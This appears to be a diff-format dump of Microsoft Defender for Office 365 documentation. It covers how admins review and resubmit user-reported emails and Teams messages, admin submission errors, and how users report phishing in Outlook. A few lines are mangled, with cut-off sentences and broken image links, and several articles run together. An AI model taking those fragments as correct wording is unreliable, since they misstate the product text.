--- User reported messages that are sent to Microsoft only or to Microsoft and the [reporting mailbox](submissions-user-reported-messages-custom-mailbox.md) appear on the **User reported** tab. Although these messages have already been reported to Microsoft, admins can resubmit the reported messages.-- User reported messages that are sent only to the reporting mailbox appear on the **User reported** tab with the **Result** value **Not Submitted to Microsoft**. Admins should report these messages to Microsoft for analysis.-
-In organizations with Microsoft Defender for Office 365 Plan 2 (add-on licenses or included in subscriptions like Microsoft 365 E5), admins can also see [user reported messages in Microsoft Teams in Defender for Office 365 Plan 2](submissions-teams.md) (currently in Preview).
-
-In organizations with Defender for Office 365 Plan 2 (add-For [user reported messages in Microsoft Teams in Defender for Office 365 Plan 2](submissions-teams.md) (currently in Preview)
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Actions & submissions** \> **Submissions**. Or, to go directly to the **Submissions** page, use <https://security.microsoft.com/reportsubmission>.
-
-On the **Submissions** page, select the **User reported** tab.
-
-The following subsections describe the information and actions that are available on the **User reported** tab on the **Submissions** page.
-
-### View user reported messages to Microsoft
-
-On the **User reported** tab, you can quickly filter the view by selecting one of the available quick filters:
--- **Threats**-- **Spam**-- **No threats**-- **Simulations**--
-You can sort the entries by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. The default values are marked with an asterisk (<sup>\*</sup>):
--- **Name and type**<sup>\*</sup>-- **Reported by**<sup>\*</sup>-- **Date reported**<sup>\*</sup>-- **Sender**<sup>\*</sup>-- **Reported reason**<sup>\*</sup>-- **Result**<sup>\*</sup>: Contains the following information for reported messages based on the [user reported settings](submissions-user-reported-messages-custom-mailbox.md):
- - **Send the reported messages to** \> **Microsoft and my reporting mailbox** or **Microsoft only**: Values derived from the following analysis:
- - **Policy hits**: Information about any policies or overrides that may have allowed or blocked the incoming messages, including overrides to our filtering verdicts. The result should be available within several minutes. Otherwise, detonation and feedback from graders could take up to one day.
- - **Payload reputation/detonation**: Up-to-date examination of any URLs and files in the message.
- - **Grader analysis**: Review done by human graders in order to confirm whether or not messages are malicious.
- - **Send the reported messages to** \> **My reporting mailbox only**: The value is always **Not submitted to Microsoft**, because the messages weren't analyzed by Microsoft.
-- **Message reported ID**-- **Network Message ID**-- **Teams message ID**-- **Sender IP**-- **Reported from**-- **Phish simulation**-- **Converted to admin submission**-- **Marked as**<sup>\*</sup>-- **Marked by**<sup>\*</sup>-- **Date marked**-- **Tags**<sup>\*</sup>: For more information about user tags, see [User tags](user-tags-about.md).-
-To group the entries, select :::image type="icon" source="../../media/m365-cc-sc-group-icon.png" border="false"::: **Group** and then select one of the following values:
--- **Sender**-- **Reported by**-- **Result**-- **Reported from**-- **Converted to admin submission**-- **Tags**-
-To ungroup the entries, select **None**.
-
-To filter the entries, select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter**. The following filters are available in the **Filter** flyout that opens:
--- **Date reported**: **Start date** and **End date**.-- **Reported by**-- **Name**-- **Message reported ID**-- **Network message ID**-- **Teams message ID**-- **Sender**-- **Reported reason**: The values **No threats**, **Phish**, and **Spam**.-- **Reported from**: The values **Microsoft** and **Third party**.-- **Phish simulation**: The values **Yes** and **No**.-- **Converted to admin submission**: The values **Yes** and **No**.-- **Message type**: The available values are:
- - **Email**
- - **Teams message** (Defender for Office 365 Plan 2 only; currently in Preview).
-- **Tags**: **All** or select one or more user tags (including Priority account) that are assigned to users. For more information about user tags, see [User tags in Microsoft Defender for Office 365](user-tags-about.md).-
-When you're finished on the **Filter** flyout, select **Apply**. To clear the filters, select :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-Use :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to export the list of entries to a CSV file.
-
-For more information about the actions that are available for messages on the **User reported** tab, see the next subsection.
-
-### View user reported email message details
-
-If you select an email-related entry on the **User reported** tab of the **Submissions** page by clicking anywhere in the row other than the check box next to the first column, a details flyout opens.
-
-At the top of the details flyout, the following message information is available:
--- The title of the flyout is the message Subject value.-- Any user tags that are assigned to the recipients of the message (including the Priority account tag). For more information, see [User tags in Microsoft Defender for Office 365](user-tags-about.md)-- The actions that are available at the top of the flyout are described in the [Admin actions for user reported messages](#admin-actions-for-user-reported-messages) section.-
-> [!TIP]
-> To see details about other submissions without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-The next sections in the details flyout are related to user reported submissions:
--- **Result details** section:
- - **Result**: Contains the **Result** value for the submission. For example:
- - **Should not have been blocked**
- - **Allowed due to user overrides**
- - **Allowed due to a rule**
- - **Recommended steps for email submissions**: Contains links to related actions. For example:
- - **View Exchange mail flow rules (transport rules)**
- - **View this message in Explorer** (Threat Explorer or Real-time detections in Defender for Office 365 only)
- - **Search for similar messages in Explorer** (Threat Explorer or Real-time detections in Defender for Office 365 only)
--- **Reported message details** section:
- - **Date submitted**
- - **Submission name**
- - **Reported reason**.
- - **Message reported ID**
- - **Reported by**
- - **Phish simulation**: The value is **Yes** or **No**.
- - **Converted to admin submission**: The value is **Yes** or **No**. For more information, see [View converted admin submissions](#view-converted-admin-submissions).
-
-The rest of the details flyout contains the **Delivery details**, **Email details**, **URLs**, and **Attachments** sections that are part of the _Email summary panel_. For more information, see [The Email summary panel](mdo-email-entity-page.md#the-email-summary-panel).
-
-> [!TIP]
-> If the **Result** value is **Phish simulation**, the details flyout might contain the following information only:
->
-> - **Result details** section
-> - **Reported message details** section
-> - **Email details** section with the following values:
-> - **Network Message ID**
-> - **Sender**
-> - **Sent date**
-
-When you're finished in the details flyout, select **Close**.
-
-### View user reported Teams message details in Defender for Office 365 Plan 2
-
-> [!TIP]
-> [User reporting of messages in Microsoft Teams](submissions-teams.md#how-users-report-messages-in-teams) is currently in Preview, isn't available in all organizations, and is subject to change.
-
-In Microsoft 365 organizations that have Microsoft Defender for Office 365 Plan 2 (add-on licenses or included in subscriptions like Microsoft 365 E5), user reported Teams messages are available on the **User reported** tab of the **Submissions** page. It's easy to find them if you filter the results by the **Message type** value **Teams message**.
-
-If you select a Teams message entry on the **User reported** tab by clicking anywhere in the row other than the check box next to the first column, a details flyout opens.
-
-At the top of the details flyout, the following message information is available:
--- The title of the flyout is the subject or the first 100 characters of the Teams message.-- The current message verdict.-- The number of links in the message.-- The available actions are described in the [Admin actions for user reported messages](#admin-actions-for-user-reported-messages) section.-
-> [!TIP]
-> To see details about other submissions without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-The next sections in the details flyout are related to user reported Teams submissions:
--- **Submission results** section:
- - **Result**: Contains the **Result** value for the submission. For example:
- - **Should not have been blocked**
- - **Not submitted to Microsoft**
- - **Recommended steps for email submissions**: Contains links to related actions. For example:
- - **View Exchange mail flow rules (transport rules)**
--- **Reported message details** section:
- - **Date reported**
- - **Submission name**
- - **Reported reason**.
- - **Message reported ID**
- - **Reported by**
- - **Phish simulation**: The value is **Yes** or **No**.
- - **Converted to admin submission**: The value is **Yes** or **No**. For more information, see [View converted admin submissions](#view-converted-admin-submissions).
-
-The rest of the details flyout contains the **Message details**, **Sender**, **Participants**, **Channel details**, and **URLs** sections that are part of the _Teams message entity panel_. For more information, see [The Teams mMessage entity panel in Microsoft Defender for Office 365 Plan 2](teams-message-entity-panel.md).
-
-> [!TIP]
-> If the **Result** value is **Phish simulation**, the details flyout might contain the following information only:
->
-> - **Result details** section
-> - **Reported message details** section
-> - **Email details** section with the following values:
-> - **Network Message ID**
-> - **Sender**
-> - **Sent date**
-
-When you're finished in the details flyout, select **Close**.
-
-### Admin actions for user reported messages
-
-On the **User reported** tab, actions for user reported messages are available on the tab itself or in the details flyout of a selected entry:
--- Select the message from the list by selecting the check box next to the first column. The following actions are available on the **User reported** tab:
- - :::image type="icon" source="../../media/m365-cc-sc-submit-user-reported-message-icon.png" border="false"::: **[Submit to Microsoft for analysis](#submit-user-reported-messages-to-microsoft-for-analysis)**
- - :::image type="icon" source="../../media/m365-cc-scc-mark-and-notify-icon.png" border="false"::: **[Mark as and notify](#notify-users-about-admin-submitted-messages-to-microsoft)**
- - **[Trigger investigation](#trigger-an-investigation-in-defender-for-office-365-plan-2)** (Defender for Office 365 Plan 2 only)
--- Select the message from the list by clicking anywhere in the row other than the check box. The following actions are available in the details flyout that opens<sup>\*</sup>:
- - :::image type="icon" source="../../media/m365-cc-sc-submit-user-reported-message-icon.png" border="false"::: **[Submit to Microsoft for analysis](#submit-user-reported-messages-to-microsoft-for-analysis)**
- - :::image type="icon" source="../../media/m365-cc-scc-mark-and-notify-icon.png" border="false"::: **[Mark as and notify](#notify-users-about-admin-submitted-messages-to-microsoft)**
- - :::image type="icon" source="../../media/m365-cc-sc-view-submission-icon.png" border="false"::: **[View the converted admin submission](#view-converted-admin-submissions)**
- - [Actions in Microsoft Defender for Office 365 only](#actions-for-user-reported-messages-in-defender-for-office-365):
- - :::image type="icon" source="../../media/m365-cc-sc-open-icon.png" border="false"::: **Open email entity**
- - :::image type="icon" source="../../media/m365-cc-sc-take-actions-icon.png" border="false"::: **Take actions**
- - :::image type="icon" source="../../media/m365-cc-sc-view-alert-icon.png" border="false"::: **View alert**
-
-[Actions for user reported messages in Defender for Office](#actions-for-user-reported-messages-in-defender-for-office-365)
-
- > [!TIP]
- > To see details or take action on other user reported messages without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-<sup>\*</sup> Depending on the nature and status of the message, some actions might not be available, are available directly at the top of the flyout, or are available under :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More actions** at the top of the flyout.
-
-These actions are described in the following subsections.
-
-> [!NOTE]
-> After a user reports a suspicious message, the user or admins can't undo the reporting of the message, regardless of where the reported message goes (to the reporting mailbox, to Microsoft, or both). The user can recover the reported message from their Deleted Items or Junk Email folders.
-
-#### Submit user reported messages to Microsoft for analysis
-
-After you select the message on the **User reported** tab, use either of the following methods to submit the message to Microsoft:
--- **On the User reported tab**: Select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Submit to Microsoft for analysis***.--- **In the details flyout of the selected message**: Select **Submit to Microsoft for analysis** or :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More options** \> **Submit to Microsoft for analysis** at the top of the flyout.-
-In the **Submit to Microsoft for analysis** flyout that opens, do the following steps based on whether the message an email message or a Teams message:
--- **Email messages**:
- - **Why are you submitting this message to Microsoft?**: Select one of the following values:
- - **It appears clean** or **It appears suspicious**: Select one of these values if you're unsure and you want a verdict from Microsoft.
-
- Select **Submit**, and then select **Done**.
-
- - **I've confirmed it's clean**: Select this value if you're sure that the item is clean, and then select **Next**.
-
- On the next page of the flyout, do one of the following steps:
-
- - Select **Submit**, and then select **Done**.
-
- or
-
- - Select **Allow this message**: This option creates an allow entry for the elements of the message in the Tenant Allow/Block List. For more information about the Tenant Allow/Block List, see [Manage allows and blocks in the Tenant Allow/Block List](tenant-allow-block-list-about.md).
-
- After you select this option, the following settings are available:
-
- - **Remove allow entry after**: The default value is **30 days**, but you can select from the following values:
- - **1 day**
- - **7 days**
- - **30 days**
- - **Specific date**: The maximum value is 30 days from today.
-
- - **Allow entry note (optional)**: Enter optional information about why you're allowing this item. For spoofed senders, any value you enter here isn't shown in the allow entry on the **Spoofed senders** tab on the **Tenant Allow/Block Lists** page.
-
- When you're finished in the flyout, select **Submit**, and then select **Done**.
-
- - **I've confirmed it's a threat**: Select this value if you're sure that the item is malicious, and then select one of the following values in the **Choose a category** section that appears:
- - **Phish**
- - **Malware**
- - **Spam**
-
- Select **Next**.
-
- On the next page of the flyout, do one of the following steps:
-
- - Select **Submit**, and then select **Done**.
-
- or
-
- - Select **Block all emails from this sender or domain**: This option creates a block entry for the sender domain or email address in the Tenant Allow/Block List. For more information about the Tenant Allow/Block List, see [Manage allows and blocks in the Tenant Allow/Block List](tenant-allow-block-list-about.md).
-
- After you select this option, the following settings are available:
-
- - By default, **Sender** is selected but you can select **Domain** instead.
- - **Remove block entry after**: The default value is **30 days**, but you can select from the following values:
- - **1 day**
- - **7 days**
- - **30 days**
- - **Never expire**
- - **Specific date**: The maximum value is 30 days from today.
- - **Block entry note (optional)**: Enter optional information about why you're blocking this item.
-
- When you're finished in the flyout, select **Submit**, and then select **Done**.
-
- :::image type="content" source="../../media/admin-submission-user-reported-submit-button-options.png" alt-text="The available actions in the Submit to Microsoft for analysis dropdown list." lightbox="../../media/admin-submission-user-reported-submit-button-options.png":::
--- **Teams messages**: Select one of the following values:
- - **I've confirmed its clean**
- - **It appears clean**
- - **It appears suspicious**
-
- After you select one of these values, select **Submit**, and then select **Done**.
-
- - **I've confirmed it's a threat**: Select this value if you're sure that the item is malicious, and then select one of the following values in the **Choose a category** section that appears:
- - **Phish**
- - **Malware**
-
- Select **Submit**, and then select **Done**.
-
-After you submit a user reported message to Microsoft from the **User reported** tab, the value of **Converted to admin submission** turns from **No** to **Yes**, and a corresponding admin submission entry is created on the appropriate tab on the **Submissions** page (for example, the **Emails** tab).
-
-#### Trigger an investigation in Defender for Office 365 Plan 2
--- **On the User reported tab**, select **Trigger investigation** in the dropdown list on :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Submit to Microsoft for analysis***.--
-For more information, see [Trigger an investigation](air-examples.md#example-a-security-administrator-triggers-an-investigation-from-threat-explorer).
-
-#### Notify users about admin submitted messages to Microsoft
-
-After an admin submits a user reported message to Microsoft from the **User reported** tab, admins can use the :::image type="icon" source="../../media/m365-cc-scc-mark-and-notify-icon.png" border="false"::: **Mark as and notify** action to mark the message with a verdict and send a templated notification message to the user who reported the message.
--- Available verdicts for email messages:
- - **No threats found**
- - **Phishing**
- - **Spam**
--- Available verdicts for Teams messages:
- - **No threats found**
- - **Phishing**
-
-For more information, see [Notify users from within the portal](submissions-admin-review-user-reported-messages.md#notify-users-from-within-the-portal).
-
-#### View converted admin submissions
-
-After an admin submits a user reported message to Microsoft from the **User reported** tab, the value of **Converted to admin submission** is **Yes**.
-
-If you select one of these messages by clicking anywhere in the row other than the check box next to the name, the details flyout contains :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More actions** \> :::image type="icon" source="../../media/m365-cc-sc-view-submission-icon.png" border="false"::: **View the converted admin submission**.
-
-This action takes you to the corresponding admin submission entry on the appropriate tab (for example, the **Emails** tab).
-
-#### Actions for user reported messages in Defender for Office 365
-
-In organizations with Microsoft Defender for Office 365 (add-on licenses or included in subscriptions like Microsoft 365 E5 or Microsoft 365 Business Premium), the following actions might also be available in the details flyout of a user reported message on the **User reported** tab:
--- :::image type="icon" source="../../medi#whats-on-the-email-entity-page).--- :::image type="icon" source="../../medi#actions-on-the-email-entity-page).--- :::image type="icon" source="../../media/m365-cc-sc-view-alert-icon.png" border="false"::: **View alert**. An alert is triggered when an admin submission is created or updated. Selecting this action takes you to the details of the alert.
security Submissions Error Messages https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/submissions-error-messages.md
- Title: Errors during admin submissions-- NOCSH-----
- - m365-security
- - tier1
-description: Learn about the errors that admins might encounter when they try to report email, URLs, and email attachments to Microsoft as false positives and false negatives.
- Previously updated : 6/20/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Errors during admin submissions
--
-This article attempts to explain the common error messages that you might receive as you try to [report messages, URLs, and email attachments to Microsoft](submissions-admin.md).
-
-## This message didn't pass through our mail flow system, or the message metadata isn't available yet error
-
-You get this error under either of the following conditions:
--- Exchange Online Protection (EOP) or Microsoft Defender for Office 365 didn't filter the message.-
- We can't investigate why the message was blocked or delivered, because the Microsoft protection stack never evaluated or acted on the message.
--- EOP or Defender for Office 365 filtered the message, but we're still collecting the required metadata (descriptive data) for the message.-
- If you wait "a while" and submit the message again, the submission is likely to be successful.
-
-## We did not receive the submission, please fix the problem and resubmit
-
-If you encounter this error message, then either of the following conditions have occurred:
--- The message was deleted or is no longer available in the mailbox or in quarantine.-- Exchange mail flow rules (also known as transport rules), connectors, or data loss prevention (DLP) rules in your organization prevent the message from reaching us.-
-Be sure to investigate and fix both of these possible causes before you resubmit the message.
security Submissions Outlook Report Messages https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/submissions-outlook-report-messages.md
- Title: Report phishing and suspicious emails in Outlook for admins-- NOCSH-----
- - m365-security
- - tier1
-description: Learn how to report phishing and suspicious emails in Outlook using the built-in Report button or the Report Message and Report Phishing add-ins.
- Previously updated : 11/9/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Report phishing and suspicious emails in Outlook for admins
--
-In Microsoft 365 organizations with mailboxes in Exchange Online, users can report phishing and suspicious email in Outlook. Users can report false positives (good email that was blocked or sent to their Junk Email folder) and false negatives (unwanted email or phishing that was delivered to their Inbox) from Outlook on all platforms using free tools from Microsoft.
-
-Microsoft provides the following tools for users to report good and bad messages:
--- Built-in reporting in Outlook on the web (formerly known as Outlook Web App or OWA).-- The Microsoft Report Message or Report Phishing add-ins. The add-ins work on virtually all Outlook platforms, including Outlook on the web. For more information, see [Enable the Microsoft Report Message or Report Phishing add-ins](submissions-users-report-message-add-in-configure.md).-
-For more information about reporting messages to Microsoft, see [Report messages and files to Microsoft](submissions-report-messages-files-to-microsoft.md).
-
-Admins configure user reported messages to go to a specified reporting mailbox, to Microsoft, or both. These user reported messages are available on the **User reported** tab on the **Submissions** page in the Microsoft Defender portal. For more information, see [User reported settings](submissions-user-reported-messages-custom-mailbox.md).
-
-## Use the built-in Report button in Outlook on the web
--- The built-in **Report** button is available in Outlook on the web *only* if user reporting is turned on *and* the built-in **Report** button in Outlook (not a non-Microsoft add-in button) are configured in the [user reported settings](submissions-user-reported-messages-custom-mailbox.md) at <https://security.microsoft.com/securitysettings/userSubmission>:-
- If user reporting is turned off and a non-Microsoft add-in button is selected, the **Report** button isn't available in Outlook on the web.
--- Currently, the **Report** button in Outlook on the web doesn't honor the before and after notification pop-up options in the user reported settings.--- Built-in reporting in Outlook on the web supports reporting messages from shared mailboxes or other mailboxes by a delegate.
- - Shared mailboxes require Send As or Send On Behalf permission for the user.
- - Other mailboxes require Send As or Send On Behalf permission _and_ Read and Manage permissions for the delegate.
-
-### Use the built-in Report button in Outlook on the web to report junk and phishing messages
--- Users can report a message as junk from the Inbox or any email folder other than Junk Email folder.-- Users can report a message as phishing from any email folder.-
-In Outlook on the web, select one or more messages, select **Report**, and then select **Report phishing** or **Report junk** in the dropdown list.
-
-> [!div class="mx-imgBorder"]
-> :::image type="content" source="../../media/owa-report-junk-phishing.png" alt-text="The results of selecting the Report button after selecting multiple messages in Outlook on the web." lightbox="../../media/owa-report-junk-phishing.png":::
-
-Based on the [User reported settings](submissions-user-reported-messages-custom-mailbox.md) in your organization, the messages are sent to the reporting mailbox, to Microsoft, or both. The following actions are also taken on the reported messages in the mailbox:
--- **Reported as junk**: The messages are moved to the Junk Email folder.-- **Reported as phishing**: The messages are deleted.-
-### Use the built-in Report button in Outlook on the web to report messages that aren't junk
-
-In Outlook on the web, select one or more messages in the Junk Email folder, select **Report**, and then select **Not junk** in the dropdown list.
-
-> [!div class="mx-imgBorder"]
-> :::image type="content" source="../../media/owa-report-as-not-junk.png" alt-text="The results of selecting the Report button after selecting multiple messages in the Junk Email folder in Outlook on the web." lightbox="../../media/owa-report-as-not-junk.png":::
-
-Based on the [User reported settings](submissions-user-reported-messages-custom-mailbox.md) in your organization, the messages are sent to the reporting mailbox, to Microsoft, or both. The messages are also moved out of Junk Email to the Inbox.
-
-## Use the Report Message and Report Phishing add-ins in Outlook
--- The procedures in this section require the Microsoft Report Message or Report Phishing add-ins. For more information, see [Enable the Microsoft Report Message or the Report Phishing add-in](submissions-users-report-message-add-in-configure.md) installed.--- The versions of Outlook that are supported by the Report Message and Report Phishing add-ins are described [here](submissions-users-report-message-add-in-configure.md#what-do-you-need-to-know-before-you-begin).-
-### Use the Report Message add-in to report junk and phishing messages in Outlook
--- Users can report a message as junk from the Inbox or any email folder other than the Junk Email folder.-- Users can report a message as phishing from any email folder.-
-1. In Outlook, do one of the following steps:
- - Select an email message from the list.
- - Open a message.
-2. Do one of the following steps based on your **Ribbon Layout** configuration in Outlook:
-
- - **Classic Ribbon**: Select **Report Message**, and then select **Junk** or **Phishing** in the dropdown list.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="../../media/OutlookReportMessage-classic-expanded.png" alt-text="Select a message and then select the Report Message button in the Classic Ribbon in Outlook." lightbox="../../media/OutlookReportMessage-classic-expanded.png":::
-
- - **Simplified Ribbon**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More commands** \> **Protection** section \> **Report Message** \> select **Junk** or **Phishing**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="../../media/OutlookReportMessage-simplified-expanded.png" alt-text="Select a message and then select the Report Message button in the Simplified Ribbon in Outlook." lightbox="../../media/OutlookReportMessage-simplified-expanded.png":::
-
-Based on the [user reported settings](submissions-user-reported-messages-custom-mailbox.md) in your organization, the messages are sent to the reporting mailbox, to Microsoft, or both. The following actions are also taken on the reported messages in the mailbox:
--- **Reported as junk**: The messages are moved to the Junk Email folder.-- **Reported as phishing**: The messages are deleted.-
-### Use the Report Message add-in to report messages that aren't junk in Outlook
-
-1. In Outlook, open a message in the Junk Email folder.
-2. Do one of the following steps based on your **Ribbon Layout** configuration in Outlook:
-
- - **Classic Ribbon**: Select **Report Message**, and then select **Not Junk** in the dropdown list.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="../../media/OutlookReportMessage-classic-expanded.png" alt-text="Select a message in the Junk Email folder, and then select the Report Message button in the Classic Ribbon in Outlook." lightbox="../../media/OutlookReportMessage-classic-expanded.png":::
-
- - **Simplified Ribbon**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More commands** \> **Protection** section \> **Report Message** \> select **Not Junk**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="../../media/OutlookReportMessage-simplified-expanded.png" alt-text="Select a message in the Junk Email folder, and then select the Report Message button in the Simplified Ribbon in Outlook." lightbox="../../media/OutlookReportMessage-simplified-expanded.png":::
-
-Based on the [user reported settings](submissions-user-reported-messages-custom-mailbox.md) in your organization, the messages are sent to the reporting mailbox, to Microsoft, or both. The messages are also moved out of Junk Email to the Inbox.
-
-### Use the Report Phishing add-in to report phishing messages in Outlook
-
-Users can report phishing messages from any email folder.
-
-1. In Outlook, do one of the following steps:
- - Select an email message from the list.
- - Open a message.
-2. Do one of the following steps based on your **Ribbon Layout** configuration in Outlook:
-
- - **Classic Ribbon**: Select **Report Phishing**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="../../media/Outlook-ReportPhishing.png" alt-text="Select a message and then select the Report Phishing button in the Classic Ribbon in Outlook." lightbox="../../media/Outlook-ReportPhishing.png":::
-
- - **Simplified Ribbon**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More commands** \> **Protection** section \> **Phishing**
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="../../media/Outlook-ReportPhishing-simplified.png" alt-text="Select a message and then select the Report Phishing button in the Simplified Ribbon in Outlook." lightbox="../../media/Outlook-ReportPhishing-simplified.png":::
-
-Based on the [User reported settings](submissions-user-reported-messages-custom-mailbox.md) in your organization, the messages are sent to the reporting mailbox, to Microsoft, or both. The messages are also deleted.
-
-## Review reported messages
-
-To review messages that users have reported to Microsoft, admins can use the **User reported** tab on the **Submissions** page in the Microsoft Defender portal at <https://security.microsoft.com/reportsubmission>. For more information, see [View user reported messages to Microsoft](submissions-admin.md#view-user-reported-messages-to-microsoft).
-
-> [!NOTE]
-> If the [User reported settings](submissions-user-reported-messages-custom-mailbox.md) in the organization send user reported messages (email and [Microsoft Teams](submissions-teams.md)) to Microsoft (exclusively or in addition to the reporting mailbox), we do the same checks as when admins submit messages to Microsoft for analysis from the **Submissions** page. So, submitting or resubmitting messages to Microsoft is useful to admins only for messages that have never been submitted to Microsoft, or when you disagree with the original verdict.
-
-## More information
-
-Admins can watch this short video to learn how to use Microsoft Defender for Office 365 to easily investigate user reported messages. Admins can determine the contents of a message and how to respond by applying the appropriate remediation action.
-
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RWBHof]
security Submissions Report Messages Files To Microsoft https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/submissions-report-messages-files-to-microsoft.md
- Title: Report spam, non-spam, phishing, suspicious emails and files to Microsoft
- - NOCSH
--- Previously updated : 11/9/2023-
- - MET150
-
- - m365-security
- - tier1
-description: How do I report a suspicious email or file to Microsoft? Report messages, URLs, email attachments and files to Microsoft for analysis. Learn to report spam email and phishing emails.
-
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# How do I report a suspicious email or file to Microsoft?
--
-Wondering what to do with suspicious email messages, URLs, email attachments, or files? In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, *users* and *admins* have different ways to report suspicious email messages, URLs, and email attachments to Microsoft.
-
-In addition, admins in Microsoft 365 organizations with Microsoft Defender for Endpoint also have several methods for reporting files.
-
-Watch this video that shows more information about the unified submissions experience.
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RE50HhM]
-
-## Report suspicious email messages to Microsoft
-
-> [!IMPORTANT]
->
-> When you make a submission to Microsoft, everything associated with the submission is copied and included in the continual algorithm reviews. This copy includes all data associated with submission, including: message content, headers, any attachments, related data about routing and all other data directly associated with the submission.
->
-> Microsoft treats your submission as your organization's permission to analyze all the information to fine tune the submission hygiene algorithms. Your submission is held in secured and audited data centers in the USA. The submission is deleted as soon as it's no longer required. Microsoft personnel might read your submitted messages and attachments, which is normally not permitted for customer data in Microsoft 365. However, your submission is still treated as confidential between you and Microsoft, and your data isn't shared with any other party as part of the review process. Microsoft may also use AI to evaluate and create responses tailored to your submissions.
->
-> For information about reporting messages in Microsoft Teams in Defender for Office 365 Plan 2, see [User reported message settings in Microsoft Teams](submissions-teams.md).
-
-|Method|Submission type|Comments|
-||||
-|[The built-in Report button](submissions-outlook-report-messages.md#use-the-built-in-report-button-in-outlook-on-the-web)|User|Currently, this method is available only in Outlook on the web (formerly known as Outlook Web App or OWA).|
-|[The Microsoft Report Message and Report Phishing add-ins](submissions-outlook-report-messages.md#use-the-report-message-and-report-phishing-add-ins-in-outlook)|User|These free add-ins work in Outlook on all available platforms. For installation instructions, see [Enable the Report Message or the Report Phishing add-ins](submissions-users-report-message-add-in-configure.md).|
-|[The Submissions page in the Microsoft Defender portal](submissions-admin.md)|Admin|Admins can report good (false positives) and bad (false negative) messages, email attachments, and URLs (entities) from the available tabs on the **Submissions** page. <br><br> Admins can also submit user reported messages from the **User reported** tab on the **Submissions** page to Microsoft for analysis. The **Submissions** page is available only in organizations with Exchange Online mailboxes as part of a Microsoft 365 subscription (not available in standalone EOP).|
-|Report messages from quarantine|Admin and User|Admins can [submit quarantined messages to Microsoft for analysis](quarantine-admin-manage-messages-files.md#report-email-to-microsoft-for-review-from-quarantine) (false positives and false negatives). <br><br> If users are allowed to [release their own messages from quarantine](quarantine-end-user.md#release-quarantined-email), and [user reported settings](submissions-user-reported-messages-custom-mailbox.md) is configured to allow users to report quarantined messages, users can select **Report message as having no threats** (false positive) when they release a quarantined message.|
-
-## Related reporting settings for admins
-
-[User reported settings](submissions-user-reported-messages-custom-mailbox.md) allow admins to configure whether user reported messages go to a specified reporting mailbox, to Microsoft, or both. After this feature is configured, user reported messages appear on the **User reported** tab on the **Submissions** page in the Defender portal.
-
-User reported messages are also available to admins in the following locations in the Microsoft Defender portal:
--- The [User-reported messages report](reports-email-security.md#user-reported-messages-report)-- [Automated investigation and response (AIR) results](air-view-investigation-results.md) (Defender for Office 365 Plan 2)-- [Threat Explorer](threat-explorer-real-time-detections-about.md) (Defender for Office 365 Plan 2)-
-In Defender for Office 365, admins can also submit messages from the [Email entity page](mdo-email-entity-page.md#actions-on-the-email-entity-page) and from [Alerts](../defender/investigate-alerts.md) in the Defender portal.
-
